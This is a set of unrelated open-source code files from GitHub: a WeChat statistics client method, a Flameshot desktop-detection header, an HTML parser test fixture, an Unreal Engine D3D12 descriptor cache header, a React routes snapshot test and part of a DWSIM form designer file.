public void msgSendDistMonthly(final String accessToken, final String startDate, final String endDate, Callback<List<MsgSendDist>> cb){
doAsync(new AsyncFunction<List<MsgSendDist>>(cb) {
@Override
public List<MsgSendDist> execute() throws Exception {
return msgSendDistMonthly(accessToken, startDate, endDate);
}
});
}
/**
* 获取消息发送分布月数据(最多跨度30天,endDate - startDate 小于 30)
* @param accessToken accessToken
* @param startDate 开始日期
* @param endDate 结束日期
* @return 发送消息分布月数据
*/
public List<MsgSendDist> msgSendDistMonthly(String accessToken, String startDate, String endDate){
return doSummary(MSG_SEND_SUMMARY_DIST_MONTH + accessToken, startDate, endDate, MSG_SEND_DIST_LIST_TYPE);
}
private <T> List<T> doSummary(String url, String startDate, String endDate, JavaType type){
checkNotNullAndEmpty(startDate, "startDate");
checkNotNullAndEmpty(endDate, "endDate");
Map<String, Object> params = buildDateRange(startDate, endDate);
Map<String, Object> resp = doPost(url, params);
return Jsons.DEFAULT.fromJson(Jsons.DEFAULT.toJson(resp.get("list")), type);
}
private Map<String, Object> buildDateRange(String start, String end) {
Map<String, Object> params = Maps.newHashMapWithExpectedSize(2);
params.put("begin_date", start);
params.put("end_date", end);
return params;
}
}
| {
"pile_set_name": "Github"
} |
// Copyright(c) 2017-2019 Alejandro Sirgo Rica & Contributors
//
// This file is part of Flameshot.
//
// Flameshot is free software: you can redistribute it and/or modify
// it under the terms of the GNU General Public License as published by
// the Free Software Foundation, either version 3 of the License, or
// (at your option) any later version.
//
// Flameshot is distributed in the hope that it will be useful,
// but WITHOUT ANY WARRANTY; without even the implied warranty of
// MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the
// GNU General Public License for more details.
//
// You should have received a copy of the GNU General Public License
// along with Flameshot. If not, see <http://www.gnu.org/licenses/>.
#pragma once
#include <QString>
class DesktopInfo
{
public:
DesktopInfo();
enum WM
{
GNOME,
KDE,
OTHER
};
bool waylandDectected();
WM windowManager();
private:
QString XDG_CURRENT_DESKTOP;
QString XDG_SESSION_TYPE;
QString WAYLAND_DISPLAY;
QString KDE_FULL_SESSION;
QString GNOME_DESKTOP_SESSION_ID;
QString GDMSESSION;
QString DESKTOP_SESSION;
};
| {
"pile_set_name": "Github"
} |
{
"name": "Text outside tags",
"options": {
"handler": {},
"parser": {}
},
"html": "Line one\n<br>\nline two",
"expected": [
{
"data": "Line one\n",
"type": "text"
},
{
"type": "tag",
"name": "br",
"attribs": {}
},
{
"data": "\nline two",
"type": "text"
}
]
} | {
"pile_set_name": "Github"
} |
// Copyright 1998-2017 Epic Games, Inc. All Rights Reserved.
/*=============================================================================
D3D12DescriptorCache.h: D3D12 State application functionality
=============================================================================*/
#pragma once
class FD3D12DynamicRHI;
struct FD3D12VertexBufferCache;
struct FD3D12IndexBufferCache;
struct FD3D12ConstantBufferCache;
struct FD3D12ShaderResourceViewCache;
struct FD3D12UnorderedAccessViewCache;
struct FD3D12SamplerStateCache;
// Like a TMap<KeyType, ValueType>
// Faster lookup performance, but possibly has false negatives
template<typename KeyType, typename ValueType>
class FD3D12ConservativeMap
{
public:
FD3D12ConservativeMap(uint32 Size)
{
Table.AddUninitialized(Size);
Reset();
}
void Add(const KeyType& Key, const ValueType& Value)
{
uint32 Index = GetIndex(Key);
Entry& Pair = Table[Index];
Pair.Valid = true;
Pair.Key = Key;
Pair.Value = Value;
}
ValueType* Find(const KeyType& Key)
{
uint32 Index = GetIndex(Key);
Entry& Pair = Table[Index];
if (Pair.Valid &&
(Pair.Key == Key))
{
return &Pair.Value;
}
else
{
return nullptr;
}
}
void Reset()
{
for (int32 i = 0; i < Table.Num(); i++)
{
Table[i].Valid = false;
}
}
private:
uint32 GetIndex(const KeyType& Key)
{
uint32 Hash = GetTypeHash(Key);
return Hash % static_cast<uint32>(Table.Num());
}
struct Entry
{
bool Valid;
KeyType Key;
ValueType Value;
};
TArray<Entry> Table;
};
uint32 GetTypeHash(const D3D12_SAMPLER_DESC& Desc);
struct FD3D12SamplerArrayDesc
{
uint32 Count;
uint16 SamplerID[16];
inline bool operator==(const FD3D12SamplerArrayDesc& rhs) const
{
check(Count <= _countof(SamplerID));
check(rhs.Count <= _countof(rhs.SamplerID));
if (Count != rhs.Count)
{
return false;
}
else
{
// It is safe to compare pointers, because samplers are kept alive for the lifetime of the RHI
return 0 == FMemory::Memcmp(SamplerID, rhs.SamplerID, sizeof(SamplerID[0]) * Count);
}
}
};
uint32 GetTypeHash(const FD3D12SamplerArrayDesc& Key);
typedef FD3D12ConservativeMap<FD3D12SamplerArrayDesc, D3D12_GPU_DESCRIPTOR_HANDLE> FD3D12SamplerMap;
template< uint32 CPUTableSize>
struct FD3D12UniqueDescriptorTable
{
FD3D12UniqueDescriptorTable() : GPUHandle({}) {};
FD3D12UniqueDescriptorTable(FD3D12SamplerArrayDesc KeyIn, CD3DX12_CPU_DESCRIPTOR_HANDLE* Table) : GPUHandle({})
{
FMemory::Memcpy(&Key, &KeyIn, sizeof(Key));//Memcpy to avoid alignement issues
FMemory::Memcpy(CPUTable, Table, Key.Count * sizeof(CD3DX12_CPU_DESCRIPTOR_HANDLE));
}
FORCEINLINE uint32 GetTypeHash(const FD3D12UniqueDescriptorTable& Table)
{
return uint32(FD3D12PipelineStateCache::HashData((void*)Table.Key.SamplerID, Table.Key.Count * sizeof(Table.Key.SamplerID[0])));
}
FD3D12SamplerArrayDesc Key;
CD3DX12_CPU_DESCRIPTOR_HANDLE CPUTable[MAX_SAMPLERS];
// This will point to the table start in the global heap
D3D12_GPU_DESCRIPTOR_HANDLE GPUHandle;
};
template<typename FD3D12UniqueDescriptorTable, bool bInAllowDuplicateKeys = false>
struct FD3D12UniqueDescriptorTableKeyFuncs : BaseKeyFuncs<FD3D12UniqueDescriptorTable, FD3D12UniqueDescriptorTable, bInAllowDuplicateKeys>
{
typedef typename TCallTraits<FD3D12UniqueDescriptorTable>::ParamType KeyInitType;
typedef typename TCallTraits<FD3D12UniqueDescriptorTable>::ParamType ElementInitType;
/**
* @return The key used to index the given element.
*/
static FORCEINLINE KeyInitType GetSetKey(ElementInitType Element)
{
return Element;
}
/**
* @return True if the keys match.
*/
static FORCEINLINE bool Matches(KeyInitType A, KeyInitType B)
{
return A.Key == B.Key;
}
/** Calculates a hash index for a key. */
static FORCEINLINE uint32 GetKeyHash(KeyInitType Key)
{
return GetTypeHash(Key.Key);
}
};
typedef FD3D12UniqueDescriptorTable<MAX_SAMPLERS> FD3D12UniqueSamplerTable;
typedef TSet<FD3D12UniqueSamplerTable, FD3D12UniqueDescriptorTableKeyFuncs<FD3D12UniqueSamplerTable>> FD3D12SamplerSet;
class FD3D12DescriptorCache;
class FD3D12OfflineDescriptorManager : public FD3D12SingleNodeGPUObject
{
public: // Types
typedef D3D12_CPU_DESCRIPTOR_HANDLE HeapOffset;
typedef decltype(HeapOffset::ptr) HeapOffsetRaw;
typedef uint32 HeapIndex;
private: // Types
struct SFreeRange { HeapOffsetRaw Start; HeapOffsetRaw End; };
struct SHeapEntry
{
TRefCountPtr<ID3D12DescriptorHeap> m_Heap;
TDoubleLinkedList<SFreeRange> m_FreeList;
SHeapEntry() { }
};
typedef TArray<SHeapEntry> THeapMap;
static D3D12_DESCRIPTOR_HEAP_DESC CreateDescriptor(GPUNodeMask Node, D3D12_DESCRIPTOR_HEAP_TYPE Type, uint32 NumDescriptorsPerHeap)
{
D3D12_DESCRIPTOR_HEAP_DESC Desc = {};
Desc.Type = Type;
Desc.NumDescriptors = NumDescriptorsPerHeap;
Desc.Flags = D3D12_DESCRIPTOR_HEAP_FLAG_NONE;// None as this heap is offline
Desc.NodeMask = Node;
return Desc;
}
public: // Methods
FD3D12OfflineDescriptorManager(GPUNodeMask Node, D3D12_DESCRIPTOR_HEAP_TYPE Type, uint32 NumDescriptorsPerHeap)
: m_Desc(CreateDescriptor(Node, Type, NumDescriptorsPerHeap))
, m_DescriptorSize(0)
, m_pDevice(nullptr)
, FD3D12SingleNodeGPUObject(Node)
{}
void Init(ID3D12Device* pDevice)
{
m_pDevice = pDevice;
m_DescriptorSize = pDevice->GetDescriptorHandleIncrementSize(m_Desc.Type);
}
HeapOffset AllocateHeapSlot(HeapIndex &outIndex)
{
FScopeLock Lock(&CritSect);
if (0 == m_FreeHeaps.Num())
{
AllocateHeap();
}
check(0 != m_FreeHeaps.Num());
auto Head = m_FreeHeaps.GetHead();
outIndex = Head->GetValue();
SHeapEntry &HeapEntry = m_Heaps[outIndex];
check(0 != HeapEntry.m_FreeList.Num());
SFreeRange &Range = HeapEntry.m_FreeList.GetHead()->GetValue();
HeapOffset Ret = { Range.Start };
Range.Start += m_DescriptorSize;
if (Range.Start == Range.End)
{
HeapEntry.m_FreeList.RemoveNode(HeapEntry.m_FreeList.GetHead());
if (0 == HeapEntry.m_FreeList.Num())
{
m_FreeHeaps.RemoveNode(Head);
}
}
return Ret;
}
void FreeHeapSlot(HeapOffset Offset, HeapIndex index)
{
FScopeLock Lock(&CritSect);
SHeapEntry &HeapEntry = m_Heaps[index];
SFreeRange NewRange =
{
Offset.ptr,
Offset.ptr + m_DescriptorSize
};
bool bFound = false;
for (auto Node = HeapEntry.m_FreeList.GetHead();
Node != nullptr && !bFound;
Node = Node->GetNextNode())
{
SFreeRange &Range = Node->GetValue();
check(Range.Start < Range.End);
if (Range.Start == Offset.ptr + m_DescriptorSize)
{
Range.Start = Offset.ptr;
bFound = true;
}
else if (Range.End == Offset.ptr)
{
Range.End += m_DescriptorSize;
bFound = true;
}
else
{
check(Range.End < Offset.ptr || Range.Start > Offset.ptr);
if (Range.Start > Offset.ptr)
{
HeapEntry.m_FreeList.InsertNode(NewRange, Node);
bFound = true;
}
}
}
if (!bFound)
{
if (0 == HeapEntry.m_FreeList.Num())
{
m_FreeHeaps.AddTail(index);
}
HeapEntry.m_FreeList.AddTail(NewRange);
}
}
private: // Methods
void AllocateHeap()
{
TRefCountPtr<ID3D12DescriptorHeap> Heap;
VERIFYD3D12RESULT(m_pDevice->CreateDescriptorHeap(&m_Desc, IID_PPV_ARGS(Heap.GetInitReference())));
SetName(Heap, L"FD3D12OfflineDescriptorManager Descriptor Heap");
HeapOffset HeapBase = Heap->GetCPUDescriptorHandleForHeapStart();
check(HeapBase.ptr != 0);
// Allocate and initialize a single new entry in the map
m_Heaps.SetNum(m_Heaps.Num() + 1);
SHeapEntry& HeapEntry = m_Heaps.Last();
HeapEntry.m_FreeList.AddTail({ HeapBase.ptr,
HeapBase.ptr + m_Desc.NumDescriptors * m_DescriptorSize });
HeapEntry.m_Heap = Heap;
m_FreeHeaps.AddTail(m_Heaps.Num() - 1);
}
private: // Members
const D3D12_DESCRIPTOR_HEAP_DESC m_Desc;
uint32 m_DescriptorSize;
ID3D12Device* m_pDevice; // weak-ref
THeapMap m_Heaps;
TDoubleLinkedList<HeapIndex> m_FreeHeaps;
FCriticalSection CritSect;
};
class FD3D12OnlineHeap : public FD3D12DeviceChild, public FD3D12SingleNodeGPUObject
{
public:
FD3D12OnlineHeap(FD3D12Device* Device, GPUNodeMask Node, bool CanLoopAround, FD3D12DescriptorCache* _Parent = nullptr);
virtual ~FD3D12OnlineHeap() { }
FORCEINLINE D3D12_CPU_DESCRIPTOR_HANDLE GetCPUSlotHandle(uint32 Slot) const { return{ CPUBase.ptr + Slot * DescriptorSize }; }
FORCEINLINE D3D12_GPU_DESCRIPTOR_HANDLE GetGPUSlotHandle(uint32 Slot) const { return{ GPUBase.ptr + Slot * DescriptorSize }; }
inline const uint32 GetDescriptorSize() const { return DescriptorSize; }
const D3D12_DESCRIPTOR_HEAP_DESC& GetDesc() const { return Desc; }
// Call this to reserve descriptor heap slots for use by the command list you are currently recording. This will wait if
// necessary until slots are free (if they are currently in use by another command list.) If the reservation can be
// fulfilled, the index of the first reserved slot is returned (all reserved slots are consecutive.) If not, it will
// throw an exception.
bool CanReserveSlots(uint32 NumSlots);
uint32 ReserveSlots(uint32 NumSlotsRequested);
void SetNextSlot(uint32 NextSlot);
ID3D12DescriptorHeap* GetHeap() { return Heap.GetReference(); }
void SetParent(FD3D12DescriptorCache* InParent) { Parent = InParent; }
// Roll over behavior depends on the heap type
virtual bool RollOver() = 0;
virtual void NotifyCurrentCommandList(const FD3D12CommandListHandle& CommandListHandle);
virtual uint32 GetTotalSize()
{
return Desc.NumDescriptors;
}
static const uint32 HeapExhaustedValue = uint32(-1);
protected:
FD3D12DescriptorCache* Parent;
FD3D12CommandListHandle CurrentCommandList;
// Handles for manipulation of the heap
uint32 DescriptorSize;
D3D12_CPU_DESCRIPTOR_HANDLE CPUBase;
D3D12_GPU_DESCRIPTOR_HANDLE GPUBase;
// This index indicate where the next set of descriptors should be placed *if* there's room
uint32 NextSlotIndex;
// Indicates the last free slot marked by the command list being finished
uint32 FirstUsedSlot;
// Keeping this ptr around is basically just for lifetime management
TRefCountPtr<ID3D12DescriptorHeap> Heap;
// Desc contains the number of slots and allows for easy recreation
D3D12_DESCRIPTOR_HEAP_DESC Desc;
const bool bCanLoopAround;
};
class FD3D12GlobalOnlineHeap : public FD3D12OnlineHeap
{
public:
FD3D12GlobalOnlineHeap(FD3D12Device* Device, GPUNodeMask Node)
: bUniqueDescriptorTablesAreDirty(false)
, FD3D12OnlineHeap(Device, Node, false)
{ }
void Init(uint32 TotalSize, D3D12_DESCRIPTOR_HEAP_TYPE Type);
void ToggleDescriptorTablesDirtyFlag(bool Value) { bUniqueDescriptorTablesAreDirty = Value; }
bool DescriptorTablesDirty() { return bUniqueDescriptorTablesAreDirty; }
FD3D12SamplerSet& GetUniqueDescriptorTables() { return UniqueDescriptorTables; }
FCriticalSection& GetCriticalSection() { return CriticalSection; }
bool RollOver();
private:
FD3D12SamplerSet UniqueDescriptorTables;
bool bUniqueDescriptorTablesAreDirty;
FCriticalSection CriticalSection;
};
struct FD3D12OnlineHeapBlock
{
public:
FD3D12OnlineHeapBlock(uint32 _BaseSlot, uint32 _Size) :
BaseSlot(_BaseSlot), Size(_Size), SizeUsed(0), bFresh(true) {};
FD3D12OnlineHeapBlock() : BaseSlot(0), Size(0), SizeUsed(0), bFresh(true) {}
FD3D12CLSyncPoint SyncPoint;
uint32 BaseSlot;
uint32 Size;
uint32 SizeUsed;
// Indicates that this has never been used in a Command List before
bool bFresh;
};
class FD3D12SubAllocatedOnlineHeap : public FD3D12OnlineHeap
{
public:
struct SubAllocationDesc
{
SubAllocationDesc() :ParentHeap(nullptr), BaseSlot(0), Size(0) {};
SubAllocationDesc(FD3D12GlobalOnlineHeap* _ParentHeap, uint32 _BaseSlot, uint32 _Size) :
ParentHeap(_ParentHeap), BaseSlot(_BaseSlot), Size(_Size) {};
FD3D12GlobalOnlineHeap* ParentHeap;
uint32 BaseSlot;
uint32 Size;
};
FD3D12SubAllocatedOnlineHeap(FD3D12Device* Device, GPUNodeMask Node, FD3D12DescriptorCache* Parent) :
FD3D12OnlineHeap(Device, Node, false, Parent) {};
void Init(SubAllocationDesc _Desc);
// Specializations
bool RollOver();
void NotifyCurrentCommandList(const FD3D12CommandListHandle& CommandListHandle);
virtual uint32 GetTotalSize() final override
{
return CurrentSubAllocation.Size;
}
private:
TQueue<FD3D12OnlineHeapBlock> DescriptorBlockPool;
SubAllocationDesc SubDesc;
FD3D12OnlineHeapBlock CurrentSubAllocation;
};
class FD3D12ThreadLocalOnlineHeap : public FD3D12OnlineHeap
{
public:
FD3D12ThreadLocalOnlineHeap(FD3D12Device* Device, GPUNodeMask Node, FD3D12DescriptorCache* _Parent)
: FD3D12OnlineHeap(Device, Node, true, _Parent)
{ }
bool RollOver();
void NotifyCurrentCommandList(const FD3D12CommandListHandle& CommandListHandle);
void Init(uint32 NumDescriptors, D3D12_DESCRIPTOR_HEAP_TYPE Type);
private:
struct SyncPointEntry
{
FD3D12CLSyncPoint SyncPoint;
uint32 LastSlotInUse;
SyncPointEntry() : LastSlotInUse(0)
{}
SyncPointEntry(const SyncPointEntry& InSyncPoint) : SyncPoint(InSyncPoint.SyncPoint), LastSlotInUse(InSyncPoint.LastSlotInUse)
{}
SyncPointEntry& operator = (const SyncPointEntry& InSyncPoint)
{
SyncPoint = InSyncPoint.SyncPoint;
LastSlotInUse = InSyncPoint.LastSlotInUse;
return *this;
}
};
TQueue<SyncPointEntry> SyncPoints;
struct PoolEntry
{
TRefCountPtr<ID3D12DescriptorHeap> Heap;
FD3D12CLSyncPoint SyncPoint;
PoolEntry()
{}
PoolEntry(const PoolEntry& InPoolEntry) : Heap(InPoolEntry.Heap), SyncPoint(InPoolEntry.SyncPoint)
{}
PoolEntry& operator = (const PoolEntry& InPoolEntry)
{
Heap = InPoolEntry.Heap;
SyncPoint = InPoolEntry.SyncPoint;
return *this;
}
};
PoolEntry Entry;
TQueue<PoolEntry> ReclaimPool;
};
//-----------------------------------------------------------------------------
// FD3D12DescriptorCache Class Definition
//-----------------------------------------------------------------------------
class FD3D12DescriptorCache : public FD3D12DeviceChild, public FD3D12SingleNodeGPUObject
{
protected:
FD3D12CommandContext* CmdContext;
public:
FD3D12OnlineHeap* GetCurrentViewHeap() { return CurrentViewHeap; }
FD3D12OnlineHeap* GetCurrentSamplerHeap() { return CurrentSamplerHeap; }
FD3D12DescriptorCache(GPUNodeMask Node);
~FD3D12DescriptorCache()
{
if (LocalViewHeap) { delete(LocalViewHeap); }
}
inline ID3D12DescriptorHeap* GetViewDescriptorHeap()
{
return CurrentViewHeap->GetHeap();
}
inline ID3D12DescriptorHeap* GetSamplerDescriptorHeap()
{
return CurrentSamplerHeap->GetHeap();
}
// Checks if the specified descriptor heap has been set on the current command list.
bool IsHeapSet(ID3D12DescriptorHeap* const pHeap) const
{
return (pHeap == pPreviousViewHeap) || (pHeap == pPreviousSamplerHeap);
}
// Notify the descriptor cache every time you start recording a command list.
// This sets descriptor heaps on the command list and indicates the current fence value which allows
// us to avoid querying DX12 for that value thousands of times per frame, which can be costly.
void NotifyCurrentCommandList(const FD3D12CommandListHandle& CommandListHandle);
// ------------------------------------------------------
// end Descriptor Slot Reservation stuff
// null views
TRefCountPtr<FD3D12ShaderResourceView> pNullSRV;
TRefCountPtr<FD3D12UnorderedAccessView> pNullUAV;
TRefCountPtr<FD3D12RenderTargetView> pNullRTV;
#if USE_STATIC_ROOT_SIGNATURE
FD3D12ConstantBufferView* pNullCBV;
#endif
TRefCountPtr<FD3D12SamplerState> pDefaultSampler;
void SetIndexBuffer(FD3D12IndexBufferCache& Cache);
void SetVertexBuffers(FD3D12VertexBufferCache& Cache);
void SetRenderTargets(FD3D12RenderTargetView** RenderTargetViewArray, uint32 Count, FD3D12DepthStencilView* DepthStencilTarget);
template <EShaderFrequency ShaderStage>
void SetUAVs(FD3D12UnorderedAccessViewCache& Cache, const UAVSlotMask& SlotsNeededMask, uint32 Count, uint32 &HeapSlot);
template <EShaderFrequency ShaderStage>
void SetSamplers(FD3D12SamplerStateCache& Cache, const SamplerSlotMask& SlotsNeededMask, uint32 Count, uint32& HeapSlot);
template <EShaderFrequency ShaderStage>
void SetSRVs(FD3D12ShaderResourceViewCache& Cache, const SRVSlotMask& SlotsNeededMask, uint32 Count, uint32& HeapSlot);
template <EShaderFrequency ShaderStage>
#if USE_STATIC_ROOT_SIGNATURE
void SetConstantBuffers(FD3D12ConstantBufferCache& Cache, const CBVSlotMask& SlotsNeededMask, uint32 Count, uint32& HeapSlot);
#else
void SetConstantBuffers(FD3D12ConstantBufferCache& Cache, const CBVSlotMask& SlotsNeededMask);
#endif
void SetStreamOutTargets(FD3D12Resource **Buffers, uint32 Count, const uint32* Offsets);
bool HeapRolledOver(D3D12_DESCRIPTOR_HEAP_TYPE Type);
void HeapLoopedAround(D3D12_DESCRIPTOR_HEAP_TYPE Type);
void Init(FD3D12Device* InParent, FD3D12CommandContext* InCmdContext, uint32 InNumLocalViewDescriptors, uint32 InNumSamplerDescriptors, FD3D12SubAllocatedOnlineHeap::SubAllocationDesc& SubHeapDesc);
void Clear();
void BeginFrame();
void EndFrame();
void GatherUniqueSamplerTables();
bool SwitchToContextLocalViewHeap(const FD3D12CommandListHandle& CommandListHandle);
bool SwitchToContextLocalSamplerHeap();
bool SwitchToGlobalSamplerHeap();
TArray<FD3D12UniqueSamplerTable>& GetUniqueTables() { return UniqueTables; }
inline bool UsingGlobalSamplerHeap() const { return bUsingGlobalSamplerHeap; }
FD3D12SamplerSet& GetLocalSamplerSet() { return LocalSamplerSet; }
private:
// Sets the current descriptor tables on the command list and marks any descriptor tables as dirty if necessary.
// Returns true if one of the heaps actually changed, false otherwise.
bool SetDescriptorHeaps();
// The previous view and sampler heaps set on the current command list.
ID3D12DescriptorHeap* pPreviousViewHeap;
ID3D12DescriptorHeap* pPreviousSamplerHeap;
FD3D12OnlineHeap* CurrentViewHeap;
FD3D12OnlineHeap* CurrentSamplerHeap;
FD3D12ThreadLocalOnlineHeap* LocalViewHeap;
FD3D12ThreadLocalOnlineHeap LocalSamplerHeap;
FD3D12SubAllocatedOnlineHeap SubAllocatedViewHeap;
FD3D12SamplerMap SamplerMap;
TArray<FD3D12UniqueSamplerTable> UniqueTables;
FD3D12SamplerSet LocalSamplerSet;
bool bUsingGlobalSamplerHeap;
uint32 NumLocalViewDescriptors;
}; | {
"pile_set_name": "Github"
} |
import React from 'react';
import {shallow} from 'enzyme/build';
import Routes from '../routes';
describe('Routes component test suite', () => {
test('Snapshot render', () => {
// Given
const routes = shallow(<Routes />);
// When
const wrappedSwitch = routes.find('SwitchWrapper').dive();
// Then
expect(wrappedSwitch).toMatchSnapshot();
});
});
| {
"pile_set_name": "Github"
} |
<Global.Microsoft.VisualBasic.CompilerServices.DesignerGenerated()> _
Partial Class EditingForm_Adjust
Inherits SharedClasses.ObjectEditorForm
'Form overrides dispose to clean up the component list.
<System.Diagnostics.DebuggerNonUserCode()> _
Protected Overrides Sub Dispose(ByVal disposing As Boolean)
Try
If disposing AndAlso components IsNot Nothing Then
components.Dispose()
End If
Finally
MyBase.Dispose(disposing)
End Try
End Sub
'Required by the Windows Form Designer
Private components As System.ComponentModel.IContainer
'NOTE: The following procedure is required by the Windows Form Designer
'It can be modified using the Windows Form Designer.
'Do not modify it using the code editor.
<System.Diagnostics.DebuggerStepThrough()> _
Private Sub InitializeComponent()
Me.components = New System.ComponentModel.Container()
Dim resources As System.ComponentModel.ComponentResourceManager = New System.ComponentModel.ComponentResourceManager(GetType(EditingForm_Adjust))
Me.GroupBox5 = New System.Windows.Forms.GroupBox()
Me.lblTag = New System.Windows.Forms.TextBox()
Me.chkActive = New System.Windows.Forms.CheckBox()
Me.Label11 = New System.Windows.Forms.Label()
Me.GroupBox4 = New System.Windows.Forms.GroupBox()
Me.rtbAnnotations = New Extended.Windows.Forms.RichTextBoxExtended()
Me.GroupBox2 = New System.Windows.Forms.GroupBox()
Me.tbTolerance = New System.Windows.Forms.TextBox()
Me.Label1 = New System.Windows.Forms.Label()
Me.lblSPUnits = New System.Windows.Forms.Label()
Me.btnOpenControlPanel = New System.Windows.Forms.Button()
Me.tbSetPoint = New System.Windows.Forms.TextBox()
Me.Label3 = New System.Windows.Forms.Label()
Me.chkSolveGlobal = New System.Windows.Forms.CheckBox()
Me.GroupBox1 = New System.Windows.Forms.GroupBox()
Me.chkUseReferenced = New System.Windows.Forms.CheckBox()
Me.lblRefVal = New System.Windows.Forms.Label()
Me.Label9 = New System.Windows.Forms.Label()
Me.Label10 = New System.Windows.Forms.Label()
Me.cbRefProp = New System.Windows.Forms.ComboBox()
Me.cbRefObj = New System.Windows.Forms.ComboBox()
Me.lblTargetVal = New System.Windows.Forms.Label()
Me.lblSourceVal = New System.Windows.Forms.Label()
Me.Label6 = New System.Windows.Forms.Label()
Me.Label5 = New System.Windows.Forms.Label()
Me.Label2 = New System.Windows.Forms.Label()
Me.cbTargetProp = New System.Windows.Forms.ComboBox()
Me.cbTargetObj = New System.Windows.Forms.ComboBox()
Me.Label4 = New System.Windows.Forms.Label()
Me.Label7 = New System.Windows.Forms.Label()
Me.cbSourceProp = New System.Windows.Forms.ComboBox()
Me.cbSourceObj = New System.Windows.Forms.ComboBox()
Me.Label19 = New System.Windows.Forms.Label()
Me.ToolTip1 = New System.Windows.Forms.ToolTip(Me.components)
Me.ToolTipChangeTag = New System.Windows.Forms.ToolTip(Me.components)
Me.GroupBox5.SuspendLayout()
Me.GroupBox4.SuspendLayout()
Me.GroupBox2.SuspendLayout()
Me.GroupBox1.SuspendLayout()
Me.SuspendLayout()
'
'GroupBox5
'
resources.ApplyResources(Me.GroupBox5, "GroupBox5")
Me.GroupBox5.Controls.Add(Me.lblTag)
Me.GroupBox5.Controls.Add(Me.chkActive)
Me.GroupBox5.Controls.Add(Me.Label11)
Me.GroupBox5.Name = "GroupBox5"
Me.GroupBox5.TabStop = False
Me.ToolTipChangeTag.SetToolTip(Me.GroupBox5, resources.GetString("GroupBox5.ToolTip"))
Me.ToolTipValues.SetToolTip(Me.GroupBox5, resources.GetString("GroupBox5.ToolTip1"))
Me.ToolTip1.SetToolTip(Me.GroupBox5, resources.GetString("GroupBox5.ToolTip2"))
'
'lblTag
'
resources.ApplyResources(Me.lblTag, "lblTag")
Me.lblTag.Name = "lblTag"
Me.ToolTipValues.SetToolTip(Me.lblTag, resources.GetString("lblTag.ToolTip"))
Me.ToolTip1.SetToolTip(Me.lblTag, resources.GetString("lblTag.ToolTip1"))
Me.ToolTipChangeTag.SetToolTip(Me.lblTag, resources.GetString("lblTag.ToolTip2"))
'
'chkActive
'
resources.ApplyResources(Me.chkActive, "chkActive")
Me.chkActive.Image = Global.DWSIM.UnitOperations.My.Resources.Resources.bullet_tick
Me.chkActive.Name = "chkActive"
Me.ToolTip1.SetToolTip(Me.chkActive, resources.GetString("chkActive.ToolTip"))
Me.ToolTipChangeTag.SetToolTip(Me.chkActive, resources.GetString("chkActive.ToolTip1"))
Me.ToolTipValues.SetToolTip(Me.chkActive, resources.GetString("chkActive.ToolTip2"))
Me.chkActive.UseVisualStyleBackColor = True
'
'Label11
'
resources.ApplyResources(Me.Label11, "Label11")
Me.Label11.Name = "Label11"
Me.ToolTip1.SetToolTip(Me.Label11, resources.GetString("Label11.ToolTip"))
Me.ToolTipChangeTag.SetToolTip(Me.Label11, resources.GetString("Label11.ToolTip1"))
Me.ToolTipValues.SetToolTip(Me.Label11, resources.GetString("Label11.ToolTip2"))
'
'GroupBox4
'
resources.ApplyResources(Me.GroupBox4, "GroupBox4")
Me.GroupBox4.Controls.Add(Me.rtbAnnotations)
Me.GroupBox4.Name = "GroupBox4"
Me.GroupBox4.TabStop = False
Me.ToolTipChangeTag.SetToolTip(Me.GroupBox4, resources.GetString("GroupBox4.ToolTip"))
Me.ToolTipValues.SetToolTip(Me.GroupBox4, resources.GetString("GroupBox4.ToolTip1"))
Me.ToolTip1.SetToolTip(Me.GroupBox4, resources.GetString("GroupBox4.ToolTip2"))
'
'rtbAnnotations
'
resources.ApplyResources(Me.rtbAnnotations, "rtbAnnotations")
Me.rtbAnnotations.Name = "rtbAnnotations"
Me.rtbAnnotations.Rtf = "{\rtf1\ansi\ansicpg1252\deff0\nouicompat\deflang1046{\fonttbl{\f0\fnil Microsoft " &
"Sans Serif;}}" & Global.Microsoft.VisualBasic.ChrW(13) & Global.Microsoft.VisualBasic.ChrW(10) & "{\*\generator Riched20 10.0.17763}\viewkind4\uc1 " & Global.Microsoft.VisualBasic.ChrW(13) & Global.Microsoft.VisualBasic.ChrW(10) & "\pard\f0\fs17\" &
"par" & Global.Microsoft.VisualBasic.ChrW(13) & Global.Microsoft.VisualBasic.ChrW(10) & "}" & Global.Microsoft.VisualBasic.ChrW(13) & Global.Microsoft.VisualBasic.ChrW(10)
Me.rtbAnnotations.ShowRedo = False
Me.rtbAnnotations.ShowUndo = False
Me.ToolTipValues.SetToolTip(Me.rtbAnnotations, resources.GetString("rtbAnnotations.ToolTip"))
Me.ToolTip1.SetToolTip(Me.rtbAnnotations, resources.GetString("rtbAnnotations.ToolTip1"))
Me.ToolTipChangeTag.SetToolTip(Me.rtbAnnotations, resources.GetString("rtbAnnotations.ToolTip2"))
'
'GroupBox2
'
resources.ApplyResources(Me.GroupBox2, "GroupBox2")
Me.GroupBox2.Controls.Add(Me.tbTolerance)
Me.GroupBox2.Controls.Add(Me.Label1)
Me.GroupBox2.Controls.Add(Me.lblSPUnits)
Me.GroupBox2.Controls.Add(Me.btnOpenControlPanel)
Me.GroupBox2.Controls.Add(Me.tbSetPoint)
Me.GroupBox2.Controls.Add(Me.Label3)
Me.GroupBox2.Controls.Add(Me.chkSolveGlobal)
Me.GroupBox2.Name = "GroupBox2"
Me.GroupBox2.TabStop = False
Me.ToolTipChangeTag.SetToolTip(Me.GroupBox2, resources.GetString("GroupBox2.ToolTip"))
Me.ToolTipValues.SetToolTip(Me.GroupBox2, resources.GetString("GroupBox2.ToolTip1"))
Me.ToolTip1.SetToolTip(Me.GroupBox2, resources.GetString("GroupBox2.ToolTip2"))
'
'tbTolerance
'
resources.ApplyResources(Me.tbTolerance, "tbTolerance")
Me.tbTolerance.Name = "tbTolerance"
Me.ToolTipValues.SetToolTip(Me.tbTolerance, resources.GetString("tbTolerance.ToolTip"))
Me.ToolTip1.SetToolTip(Me.tbTolerance, resources.GetString("tbTolerance.ToolTip1"))
Me.ToolTipChangeTag.SetToolTip(Me.tbTolerance, resources.GetString("tbTolerance.ToolTip2"))
'
'Label1
'
resources.ApplyResources(Me.Label1, "Label1")
Me.Label1.Name = "Label1"
Me.ToolTip1.SetToolTip(Me.Label1, resources.GetString("Label1.ToolTip"))
Me.ToolTipChangeTag.SetToolTip(Me.Label1, resources.GetString("Label1.ToolTip1"))
Me.ToolTipValues.SetToolTip(Me.Label1, resources.GetString("Label1.ToolTip2"))
'
'lblSPUnits
'
